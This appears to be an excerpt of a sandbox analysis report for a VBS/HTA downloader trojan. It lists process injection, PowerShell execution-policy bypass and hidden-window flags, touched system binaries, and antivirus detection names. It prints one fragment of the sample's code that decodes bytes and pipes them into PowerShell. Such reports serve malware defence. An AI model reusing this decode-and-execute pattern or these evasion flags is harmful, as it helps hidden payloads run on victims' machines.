$BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell -
Process injection Process 2612 resumed a thread in remote process 2700
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000360
suspend_count: 1
process_identifier: 2700
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.HTML.Electryon.4!c
Skyhigh HTA/Downloader.e
ALYac VBS:Electryon.308
VIPRE VBS:Electryon.308
Arcabit VBS:Electryon.308
Symantec ISB.Downloader!gen63
ESET-NOD32 VBS/Agent.QVZ
McAfee HTA/Downloader.e
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VBS:Electryon.308
MicroWorld-eScan VBS:Electryon.308
Rising Trojan.Agent/VBS!1.EA60 (CLASSIC)
Emsisoft VBS:Electryon.308 (B)
Google Detected
Gridinsoft Trojan.U.AsyncRAT.tr
GData Script.Trojan.VBS.AH
Varist VBS/Agent.BCE
Tencent Script.Trojan.Generic.Wylw
Ikarus Trojan-Downloader.NetSupport
Fortinet VBS/Agent.QVZ!tr
AVG Other:Malware-gen [Trj]